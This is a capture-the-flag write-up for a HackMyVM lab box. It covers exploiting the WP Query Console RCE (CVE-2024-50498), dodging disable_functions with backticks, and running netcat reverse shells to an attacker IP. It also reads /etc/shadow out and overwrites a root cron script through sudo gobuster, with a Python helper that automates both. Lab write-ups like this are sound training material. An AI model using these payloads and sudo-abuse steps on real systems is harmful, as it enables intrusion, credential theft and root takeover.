HMV Buster
Todd

Information Gathering

When my VM booted, its hostname was Listen; at first I thought I had downloaded the wrong image.

```
IP=192.168.0.192
nmap $IP -p-

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-05 04:16 EST
Nmap scan report for 192.168.0.192
Host is up (0.00046s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 4.96 seconds
```

Opening port 80: hey, isn't this bamuwe's blog, haha. The page footer says WordPress in plain sight, so a WPScan run is mandatory. Plugin enumeration is set to aggressive so that plugins not referenced anywhere in the HTML are still found by probing known paths:

```
wpscan --api-token $WPSCAN_API_TOKEN --url http://192.168.0.192 --plugins-detection aggressive -e u,ap

[+] wp-query-console
| Location: http://192.168.0.192/wp-content/plugins/wp-query-console/
| Latest Version: 1.0 (up to date)
| Last Updated: 2018-03-16T16:03:00.000Z
| Readme: http://192.168.0.192/wp-content/plugins/wp-query-console/README.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.0.192/wp-content/plugins/wp-query-console/, status: 403
|
| [!] 1 vulnerability identified:
|
| [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
| References:
| - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.0.192/wp-content/plugins/wp-query-console/README.txt
```

One plugin vulnerability found: CVE-2024-50498 in wp-query-console, "WP Query Console <= 1.0 - Unauthenticated Remote Code Execution".

I found a PoC on GitHub. It is about as simple as it gets: POST to /wp-json/wqc/v1/query with the JSON body {"queryArgs":"phpinfo();","queryType":"post"} and the plugin evaluates the queryArgs string as PHP, with no authentication required.

```
curl -X POST http://192.168.0.192/wp-json/wqc/v1/query -H "Content-Type: application/json" -d '{"queryArgs":"phpinfo();","queryType":"post"}'
```

It returned the full phpinfo() output.

Attempting Exploitation

Let's try a PHP reverse shell.

```
curl -X POST http://192.168.0.192/wp-json/wqc/v1/query -H "Content-Type: application/json" -d '{"queryArgs":"system(\"bash -i >& /dev/tcp/192.168.0.100/1234 0>&1\");","queryType":"post"}'
{"status":"error","data":"null","message":"Query args invalid"}
```

Several variants all came back with Query args invalid. Maybe there's a filter? I went back through the phpinfo() output from before and the real reason was there:

```
disable_functions

passthru,exec,system,popen,chroot,scandir,chgrp,chown,escapesh
```

You can disable functions, but what about backticks? The backtick operator is just shell_exec() under the hood, so it works exactly when shell_exec is not on the list, and shell_exec doesn't appear in the part of the list shown above. Tried it:

```
curl -X POST http://192.168.0.192/wp-json/wqc/v1/query -H "Content-Type: application/json" -d '{"queryArgs":"`nc -e /bin/bash 192.168.0.30 1234`;","queryType":"post"}'
```

Whoa, it actually connected back:

```
(remote) www-data@listen:/var/www/html/wordpress$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

(remote) www-data@listen:/var/www/html/wordpress$ cat /etc/passwd
welcome:x:1001:1001::/home/welcome:/bin/sh

(remote) www-data@listen:/var/www/html/wordpress$ cat wp-config.php

define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'll104567' );

/** Database password */
define( 'DB_PASSWORD', 'thehandsomeguy' );
```

Ha, the ID ll104567 looks very familiar.

Exploitation

Connect to the database with the credentials from wp-config.php:

```
(remote) www-data@listen:/var/www/html/wordpress$ mysql -u ll104567 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 109290
Server version: 10.3.39-MariaDB-0+deb10u2 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.001 sec)

MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url              | user_registered     | user_activation_key                           | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
|  1 | ta0        | $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. | ta0           | [email protected] | http://192.168.31.181 | 2025-01-08 03:10:43 |                                               |           0 | ta0          |
|  2 | welcome    | $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ | welcome       | [email protected] |                       | 2025-01-08 04:29:28 | 1736310568:$P$B2YbhlDVF1XWIurbL11Pfoasb./0tD. |           0 | welcome      |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
2 rows in set (0.000 sec)

MariaDB [wordpress]>
```

Run john against the hashes of welcome and ta0:

```
104567           (?)
```

welcome's password is 104567.

ta0's hash wouldn't crack after a long run, so I set it aside for now.

Try SSH as welcome:

```
ssh welcome@192.168.0.192

$ id
uid=1001(welcome) gid=1001(welcome) groups=1001(welcome)
```

Privilege Escalation

Got a shell as welcome; now to see how to escalate.

```
welcome@listen:~$ sudo -l
Matching Defaults entries for welcome on listen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
    (ALL) NOPASSWD: /usr/bin/gobuster
```

It's gobuster, of all things. First instinct: since gobuster sends every line of its wordlist as a request path to whatever URL I give it, point it at a listener I control and use the flag file as the wordlist, so the flag leaves the box over HTTP.

```
sudo gobuster -u http://192.168.0.30:8000 -w /root/root.txt
```

Well, that file doesn't exist. Grab shadow instead, then?

```
sudo gobuster -u http://192.168.0.30:8000 -w /etc/shadow

192.168.0.192 - - [05/Feb/2025 22:30:08] code 404, message File not found
192.168.0.192 - - [05/Feb/2025 22:30:08] "GET /root:$6$uvmZZfH41v4CKcWZ$kAglkiLVm6RQYjB/9wZ8GgmbJQqT8QZazoC7hz27tArTJkp7wQZ..0jAnw3BEge9aeN6614uoDeRn5aHvVqc10:20096:0:99999:7::: HTTP/1.1" 404 -
```

That's root's shadow entry, straight out of the listener's access log. Crack it:

```
john --wordlist=/usr/share/wordlists/rockyou.txt ./root
```

It ran through the whole midday break with no hit, so I needed a different angle.

gobuster can also write a file (-o). Feed it some made-up data to see what the output format looks like:

```
sudo gobuster -u http://192.168.0.30:8000 -w a.txt -n -o passwd.txt

/hash
/root
```

Adding -n suppresses the status code, so the output file is cleaner. I couldn't think of a use for it at first.
Then it hit me that ll104567 had once asked me this very question, haha.

So there's an angle I've missed. Run pspy and watch:

```
/bin/sh -c /bin/bash /opt/.test.sh
```

There really is something: they've picked up the habit of hiding it in /opt. cat has no permission on it, but no worries, we exfiltrate it with gobuster, as root:

```
sudo gobuster -u http://192.168.0.30:8000 -w /opt/.test.sh

192.168.0.192 - - [05/Feb/2025 23:33:29] "GET /echo%20test HTTP/1.1" 404 -
```

First reaction: what on earth is this? Then it clicked: a script that runs as root and is writable through sudo gobuster -o is the hook that was left for us. Just write into it:

```
# First, put a reverse shell script in /tmp/run.sh
echo 'nc -e /bin/bash 192.168.0.30 1234' > /tmp/run.sh
# Make it executable
chmod +x /tmp/run.sh

# Then write tmp/run.sh into a.txt; the leading / is not needed,
# gobuster adds it in the output
echo 'tmp/run.sh' > a.txt
```

On Kali, create the file tmp/run.sh under the web root so the request for it answers 200. This matters: gobuster only records hits in the -o file, so a word that gets a 404 never makes it into /opt/.test.sh.

```
mkdir tmp
cd tmp
echo ''>run.sh
cd ..
python -m http.server
```

Then write it into the script and wait for the scheduled run:

```
sudo gobuster -u http://192.168.0.30:8000 -w a.txt -n -o /opt/.test.sh
```

Once the shell connects back, it's root:

```
(remote) root@listen:/root# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@listen:/root# ls
note.txt R00t_fl4g_is_HHHHerererererrererere.tx
```

Naturally a name I'd never have guessed, haha.
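Both gobuster primitives used above, the read (any root-readable file leaves the box one line per GET in my listener's access log) and the write (-o with -n turns a wordlist into a root-owned file of my choosing), as an added helper that is not part of the write-up. The access-log sample in it is constructed from the format shown above with a dummy hash; 192.168.0.30:8000 and /opt/.test.sh are the values from this box, and the assumptions about gobuster's behaviour are the ones the run above relied on: one request per wordlist line, spaces URL-encoded, a leading "/" added to every output line, and only positive hits written to -o.

```python
import re
from urllib.parse import unquote

# Constructed sample of the `python -m http.server` access log seen on the
# attacker side while the target runs `sudo gobuster -u http://192.168.0.30:8000
# -w <file>`: each line of <file> arrives as one GET. The hash is a dummy.
ACCESS_LOG = """\
192.168.0.192 - - [05/Feb/2025 22:30:08] code 404, message File not found
192.168.0.192 - - [05/Feb/2025 22:30:08] "GET /root:$6$SALTSALT$DUMMYHASH:20096:0:99999:7::: HTTP/1.1" 404 -
192.168.0.192 - - [05/Feb/2025 23:33:29] "GET /echo%20test HTTP/1.1" 404 -
"""

REQUEST_RE = re.compile(r'"GET /(?P<word>\S*) HTTP/1\.[01]"')


def recover_lines(log_text):
    """Undo gobuster's URL building: the request path minus the leading '/',
    URL-decoded, is one line of the file that was given to -w."""
    return [unquote(m.group("word")) for m in REQUEST_RE.finditer(log_text)]


# user:hash:lastchg:min:max:warn:inactive:expire:reserved, hash starting with '$'
SHADOW_RE = re.compile(r"^([^:]+):(\$[^:]*):(?:[^:]*:){6}[^:]*$")


def shadow_hashes(lines):
    """Pick the /etc/shadow-shaped lines out of whatever was exfiltrated and
    return {user: hash}; locked accounts ('*' or '!') carry no hash and are skipped."""
    out = {}
    for line in lines:
        m = SHADOW_RE.match(line)
        if m:
            out[m.group(1)] = m.group(2)
    return out


def write_wordlist(script_lines):
    """Wordlist for the write primitive, i.e. for
    `sudo gobuster -u http://192.168.0.30:8000 -w a.txt -n -o /opt/.test.sh`.
    gobuster prefixes every hit with '/', so a leading '/' is stripped here and
    reappears in the output file."""
    return "".join(line.lstrip("/") + "\n" for line in script_lines)


def docroot_stubs(script_lines):
    """Paths to create under the attacker's web root so every word answers 200:
    -o only records positive hits, a 404 never reaches the output file."""
    return [line.lstrip("/") for line in script_lines]


def expected_file(script_lines):
    """What the -o target will contain after the run (-n drops the status code)."""
    return "".join("/" + line.lstrip("/") + "\n" for line in script_lines)


if __name__ == "__main__":
    import os
    import sys
    log = sys.stdin.read() if not sys.stdin.isatty() else ACCESS_LOG
    for user, h in shadow_hashes(recover_lines(log)).items():
        print(f"{user}:{h}")          # paste into a file for john
    script = ["/tmp/run.sh"]          # the line /opt/.test.sh should end up with
    with open("a.txt", "w") as f:
        f.write(write_wordlist(script))
    for path in docroot_stubs(script):
        os.makedirs(os.path.dirname(path) or ".", exist_ok=True)
        open(path, "a").close()       # empty file is enough for a 200
    print("serve this directory with: python3 -m http.server 8000")
```

Pipe the listener's log into it (`python3 gb.py < access.log`) to get clean user:hash lines for john instead of copying them out of URL-encoded requests by hand; run it without input and it writes a.txt plus the tmp/run.sh stub the web server needs, which is exactly the manual setup above.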
